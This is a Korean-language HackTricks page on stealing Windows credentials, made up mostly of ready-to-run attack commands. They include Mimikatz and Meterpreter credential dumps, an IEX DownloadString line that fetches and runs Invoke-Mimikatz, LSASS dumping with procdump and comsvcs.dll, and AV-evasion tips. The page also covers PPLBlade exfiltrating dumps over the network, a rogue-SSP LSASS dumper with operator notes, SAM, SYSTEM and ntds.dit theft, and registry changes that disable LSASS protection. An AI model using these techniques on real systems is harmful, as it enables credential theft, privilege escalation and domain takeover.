Windows Credentials 탈취

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

Credentials Mimikatz

#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Mimikatz가 할 수 있는 다른 것들을 알아보려면 this page.

Invoke-Mimikatz

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'

Learn about some possible credentials protections here. 이러한 보호 조치는 Mimikatz가 일부 credentials를 추출하는 것을 방지할 수 있습니다.

Meterpreter를 이용한 Credentials

Use the Credentials Plugin 내가 만든을 사용하여 피해자 내부에서 passwords와 hashes를 검색하세요.

#Credentials from SAM
post/windows/gather/smart_hashdump
hashdump

#Using kiwi module
load kiwi
creds_all
kiwi_cmd "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam"

#Using Mimikatz module
load mimikatz
mimikatz_command -f "sekurlsa::logonpasswords"
mimikatz_command -f "lsadump::lsa /inject"
mimikatz_command -f "lsadump::sam"

AV 우회

Procdump + Mimikatz

Procdump from SysInternals 는 정식 Microsoft 도구이기 때문에 Defender에서 탐지되지 않습니다.\

이 도구를 사용하면 dump the lsass process, download the dump, 그리고 dump에서 extract하여 credentials locally를 추출할 수 있습니다.

또한 SharpDump를 사용할 수도 있습니다.

#Local
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#Remote, mount https://live.sysinternals.com which contains procdump.exe
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Get it from webdav
\\live.sysinternals.com\tools\procdump.exe -accepteula -ma lsass.exe lsass.dmp

//Load the dump
mimikatz # sekurlsa::minidump lsass.dmp
//Extract credentials
mimikatz # sekurlsa::logonPasswords

이 프로세스는 SprayKatz로 자동으로 수행됩니다: ./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24

참고: 일부 AV는 procdump.exe to dump lsass.exe의 사용을 악성으로 탐지할 수 있습니다. 이는 그들이 “procdump.exe” and “lsass.exe” 문자열을 탐지하기 때문입니다. 따라서 procdump에 lsass.exe의 PID를 argument로 pass하여 전달하는 것이 lsass.exe라는 name lsass.exe를 직접 전달하는 것 instead of 더 stealthier합니다.

Dumping lsass with comsvcs.dll

C:\Windows\System32에 있는 comsvcs.dll이라는 DLL은 충돌 시 프로세스 메모리 덤프를 담당합니다. 이 DLL에는 MiniDumpW라는 function이 포함되어 있으며 rundll32.exe로 호출하도록 설계되어 있습니다.
첫 두 인수는 중요하지 않지만, 세 번째 인수는 세 부분으로 구분됩니다. 덤프할 프로세스 ID가 첫 번째 부분을 구성하고, 덤프 파일 위치가 두 번째 부분을 나타내며, 세 번째 부분은 엄격히 단어 full입니다. 다른 옵션은 존재하지 않습니다.
이 세 구성요소를 파싱하면 DLL은 덤프 파일을 생성하고 지정된 프로세스의 메모리를 해당 파일로 기록합니다.
comsvcs.dll을 이용하면 lsass 프로세스를 덤프할 수 있으므로 procdump를 업로드하고 실행할 필요가 없습니다. 이 방법은 자세히 https://en.hackndo.com/remote-lsass-dump-passwords/에 설명되어 있습니다.

다음 명령어를 실행에 사용합니다:

rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full

이 프로세스를 자동화할 수 있습니다 lssasy.

lsass를 Task Manager로 덤프하기

Task Bar에서 오른쪽 클릭하고 Task Manager를 클릭합니다.
More details를 클릭합니다.
Processes 탭에서 “Local Security Authority Process” 프로세스를 찾습니다.
“Local Security Authority Process” 프로세스를 오른쪽 클릭하고 “Create dump file“을 클릭합니다.

lsass를 procdump로 덤프하기

Procdump는 Microsoft에서 서명한 바이너리로 sysinternals 스위트의 일부입니다.

Get-Process -Name LSASS
.\procdump.exe -ma 608 lsass.dmp

Dumpin lsass with PPLBlade

PPLBlade는 Protected Process Dumper Tool로, memory dump를 난독화하고 디스크에 저장하지 않고 원격 워크스테이션으로 전송하는 것을 지원합니다.

Key functionalities:

PPL 보호 우회
Defender의 시그니처 기반 탐지를 회피하기 위해 memory dump 파일을 난독화
RAW 및 SMB 업로드 방법으로 memory dump를 디스크에 저장하지 않고 업로드(fileless dump)

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

LalsDumper – MiniDumpWriteDump 없이 SSP 기반 LSASS 덤프

Ink Dragon는 세 단계로 구성된 dumper인 LalsDumper를 배포합니다. 이 dumper는 MiniDumpWriteDump를 전혀 호출하지 않으므로 해당 API에 대한 EDR 훅이 작동하지 않습니다:

Stage 1 loader (lals.exe) – fdp.dll에서 소문자 d 32개로 된 플레이스홀더를 찾아 이를 rtu.txt의 절대 경로로 덮어쓰고, 패치된 DLL을 nfdp.dll로 저장한 뒤 AddSecurityPackageA("nfdp","fdp")를 호출합니다. 이로 인해 LSASS가 악성 DLL을 새로운 Security Support Provider(SSP)로 로드하게 됩니다.
Stage 2 inside LSASS – LSASS가 nfdp.dll을 로드하면, DLL은 rtu.txt를 읽고 각 바이트를 0x20으로 XOR한 뒤 디코드된 blob을 메모리에 매핑하고 실행을 넘깁니다.
Stage 3 dumper – 매핑된 페이로드는 해시된 API 이름들로부터 직접 syscall을 해석하여 MiniDump 로직을 재구현합니다 (seed = 0xCD7815D6; h ^= (ch + ror32(h,8))). Tom이라는 전용 export는 %TEMP%\<pid>.ddt를 열어 압축된 LSASS 덤프를 파일에 스트리밍하고 핸들을 닫아 나중에 exfiltration할 수 있게 합니다.

Operator notes:

lals.exe, fdp.dll, nfdp.dll, rtu.txt를 같은 디렉터리에 보관하세요. Stage 1은 하드코딩된 플레이스홀더를 rtu.txt의 절대 경로로 덮어쓰므로 파일을 분리하면 체인이 끊어집니다.
등록은 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages에 nfdp를 추가하는 방식으로 이뤄집니다. 해당 값을 직접 설정하면 LSASS가 매 부팅마다 SSP를 다시 로드하게 할 수 있습니다.
%TEMP%\*.ddt 파일들은 압축된 덤프입니다. 로컬에서 압축을 풀고 Mimikatz/Volatility에 전달해 자격증명 추출을 수행하세요.
lals.exe 실행에는 admin/SeTcb 권한이 필요하여 AddSecurityPackageA 호출이 성공합니다; 호출이 반환되면 LSASS는 투명하게 rogue SSP를 로드하고 Stage 2를 실행합니다.
디스크에서 DLL을 삭제해도 LSASS에서 언로드되지는 않습니다. 레지스트리 항목을 삭제하고 LSASS를 재시작(또는 재부팅)하여 제거하거나, 장기 지속성을 위해 그대로 둘 수 있습니다.

CrackMapExec

SAM 해시 덤프

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

Dump LSA secrets

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

대상 DC에서 NTDS.dit 덤프하기

cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

대상 DC에서 NTDS.dit의 암호 이력 덤프

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history

각 NTDS.dit 계정의 pwdLastSet 속성 표시

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet

Stealing SAM & SYSTEM

이 파일들은 C:\windows\system32\config\SAM 및 _C:\windows\system32\config\SYSTEM_에 위치해야 합니다. 그러나 일반적인 방법으로는 단순히 복사할 수 없습니다. 이 파일들은 보호되어 있습니다.

레지스트리에서

해당 파일들을 탈취하는 가장 쉬운 방법은 레지스트리에서 복사본을 얻는 것입니다:

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

다운로드 해당 파일들을 Kali 머신으로 가져오고 다음을 사용해 hashes를 추출하세요:

samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

Volume Shadow Copy

이 서비스를 사용해 보호된 파일을 복사할 수 있습니다. Administrator 권한이 필요합니다.

vssadmin 사용

vssadmin binary는 Windows Server 버전에서만 사용할 수 있습니다.

vssadmin create shadow /for=C:
#Copy SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
#Copy SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
#Copy ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit

# You can also create a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

하지만 Powershell에서도 동일하게 할 수 있습니다. 다음은 SAM file을 복사하는 방법의 예입니다 (사용된 하드 드라이브는 “C:“이고 저장 위치는 C:\users\Public) 하지만 이것은 어떤 보호된 파일을 복사하는 데에도 사용할 수 있습니다:

$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\ntds\ntds.dit" C:\Users\Public
$volume.Delete();if($notrunning -eq 1){$service.Stop()}

책에서 가져온 코드: https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html

Invoke-NinjaCopy

마지막으로, PS script Invoke-NinjaCopy을 사용하여 SAM, SYSTEM 및 ntds.dit의 복사본을 만들 수도 있습니다.

Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c:\copy_of_local_sam"

Active Directory Credentials - NTDS.dit

NTDS.dit 파일은 Active Directory의 핵심으로 알려져 있으며, 사용자 객체, 그룹 및 그 멤버십에 관한 중요한 데이터를 보관합니다. 도메인 사용자의 password hashes가 저장되는 곳입니다. 이 파일은 Extensible Storage Engine (ESE) 데이터베이스이며 **%SystemRoom%/NTDS/ntds.dit**에 위치합니다.

해당 데이터베이스에는 세 가지 주요 테이블이 유지됩니다:

Data Table: 이 테이블은 사용자 및 그룹과 같은 객체에 대한 세부 정보를 저장하는 역할을 합니다.
Link Table: 그룹 멤버십과 같은 관계를 추적합니다.
SD Table: 각 객체의 Security descriptors가 여기에 저장되어 저장된 객체들에 대한 보안 및 접근 제어를 제공합니다.

More information about this: http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/

Windows는 해당 파일과 상호작용하기 위해 _Ntdsa.dll_을 사용하며, 이는 _lsass.exe_에 의해 사용됩니다. 따라서 NTDS.dit 파일의 일부는 lsass 메모리 내부에 위치할 수 있습니다(성능 향상을 위해 cache를 사용하므로 최근에 접근된 데이터를 찾을 수 있습니다).

NTDS.dit 내부의 해시 복호화

해시는 3번 암호화됩니다:

Password Encryption Key (PEK)를 BOOTKEY와 RC4를 사용해 복호화합니다.
PEK와 RC4를 사용해 hash를 복호화합니다.
DES를 사용해 hash를 복호화합니다.

PEK는 every domain controller에서 same value를 가지지만, NTDS.dit 파일 내부에서는 domain controller의 **SYSTEM file of the domain controller (is different between domain controllers)**의 BOOTKEY를 사용해 cyphered되어 있습니다. 이 때문에 NTDS.dit 파일에서 자격 증명을 얻으려면 NTDS.dit와 SYSTEM 파일이 필요합니다 (C:\Windows\System32\config\SYSTEM).

Ntdsutil를 사용한 NTDS.dit 복사

Available since Windows Server 2008.

ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

You could also use the volume shadow copy 트릭으로 ntds.dit 파일을 복사할 수도 있습니다. 또한 SYSTEM file의 사본도 필요하다는 점을 기억하세요(다시, dump it from the registry or use the volume shadow copy 트릭).

NTDS.dit에서 해시 추출

NTDS.dit와 SYSTEM 파일을 입수한 후 secretsdump.py 같은 도구를 사용해 해시를 추출할 수 있습니다:

secretsdump.py LOCAL -ntds ntds.dit -system SYSTEM -outputfile credentials.txt

또한 유효한 domain admin user를 사용하여 자동으로 추출할 수 있습니다:

secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

For 용량이 큰 NTDS.dit 파일의 경우 gosecretsdump를 사용해 추출하는 것이 권장됩니다.

마지막으로, metasploit module: post/windows/gather/credentials/domain_hashdump 또는 mimikatz lsadump::lsa /inject를 사용할 수도 있습니다.

NTDS.dit에서 도메인 객체를 SQLite 데이터베이스로 추출하기

NTDS 객체는 ntdsdotsqlite로 SQLite 데이터베이스에 추출할 수 있습니다. 이 도구는 비밀뿐만 아니라 전체 객체와 그 속성도 추출하므로, 원본 NTDS.dit 파일을 이미 확보한 경우 추가 정보 추출에 유용합니다.

ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive

The SYSTEM hive는 선택 사항이지만 다음과 같은 비밀 복호화를 허용합니다 (NT & LM hashes, supplemental credentials such as cleartext passwords, kerberos or trust keys, NT & LM password histories). 기타 정보와 함께 다음 데이터가 추출됩니다 : 해시가 포함된 사용자 및 머신 계정, UAC flags, 마지막 로그온 및 비밀번호 변경 타임스탬프, 계정 설명, 이름, UPN, SPN, 그룹 및 재귀적 멤버십, 조직 단위 트리 및 멤버십, 신뢰 도메인(트러스트 유형·방향·속성)…

Lazagne

바이너리는 here에서 다운로드하세요. 이 바이너리를 사용하여 여러 소프트웨어에서 credentials를 추출할 수 있습니다.

lazagne.exe all

SAM 및 LSASS에서 자격 증명을 추출하기 위한 기타 도구

Windows credentials Editor (WCE)

이 도구는 메모리에서 자격 증명을 추출하는 데 사용할 수 있습니다. 다음에서 다운로드하세요: http://www.ampliasecurity.com/research/windows-credentials-editor/

fgdump

SAM 파일에서 자격 증명을 추출합니다.

You can find this binary inside Kali, just do: locate fgdump.exe
fgdump.exe

PwDump

SAM 파일에서 credentials 추출

You can find this binary inside Kali, just do: locate pwdump.exe
PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump

PwDump7

Download it from: http://www.tarasco.org/security/pwdump_7 and just 실행하면 비밀번호가 추출됩니다.

유휴 RDP 세션 수집 및 보안 제어 약화

Ink Dragon’s FinalDraft RAT includes a DumpRDPHistory tasker whose techniques are handy for any red-teamer:

DumpRDPHistory 스타일 텔레메트리 수집

Outbound RDP 대상 – HKU\<SID>\SOFTWARE\Microsoft\Terminal Server Client\Servers\*의 모든 사용자 hive를 파싱합니다. 각 서브키에는 서버 이름, UsernameHint, 마지막 쓰기 타임스탬프가 저장됩니다. PowerShell로 FinalDraft의 로직을 재현할 수 있습니다:

Get-ChildItem HKU:\ | Where-Object { $_.Name -match "S-1-5-21" } | ForEach-Object {
Get-ChildItem "${_.Name}\SOFTWARE\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue |
ForEach-Object {
$server = Split-Path $_.Name -Leaf
$user = (Get-ItemProperty $_.Name).UsernameHint
"OUT:$server:$user:$((Get-Item $_.Name).LastWriteTime)"
}
}

Inbound RDP 증거 – Microsoft-Windows-TerminalServices-LocalSessionManager/Operational 로그에서 Event ID 21 (성공적 로그온) 및 25 (연결 끊김)을 쿼리하여 누가 해당 시스템을 관리했는지 매핑합니다:

Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" \
| Where-Object { $_.Id -in 21,25 } \
| Select-Object TimeCreated,@{n='User';e={$_.Properties[1].Value}},@{n='IP';e={$_.Properties[2].Value}}

일정하게 접속하는 Domain Admin을 알게 되면, 그들의 연결 끊김 세션이 남아 있는 동안 LSASS를 (LalsDumper/Mimikatz로) 덤프하세요. CredSSP + NTLM fallback은 그들의 verifier와 토큰을 LSASS에 남기며, 이를 SMB/WinRM을 통해 재사용하여 NTDS.dit를 획득하거나 도메인 컨트롤러에 persistence를 설치할 수 있습니다.

FinalDraft가 대상으로 하는 레지스트리 다운그레이드

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f

DisableRestrictedAdmin=1 설정은 RDP 동안 자격증명/티켓의 전체 재사용을 강제하여 pass-the-hash 스타일의 pivots를 가능하게 합니다.
LocalAccountTokenFilterPolicy=1은 UAC token filtering을 비활성화하여 local admins가 네트워크를 통해 제한 없는 토큰을 획득할 수 있게 합니다.
DSRMAdminLogonBehavior=2는 DC가 온라인일 때 DSRM administrator가 로그온할 수 있게 하며, attackers에게 또 다른 내장 고권한 계정을 제공합니다.
RunAsPPL=0은 LSASS PPL 보호를 제거하여 LalsDumper와 같은 dumpers가 메모리 접근을 매우 쉽게 할 수 있게 합니다.

참고자료

Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.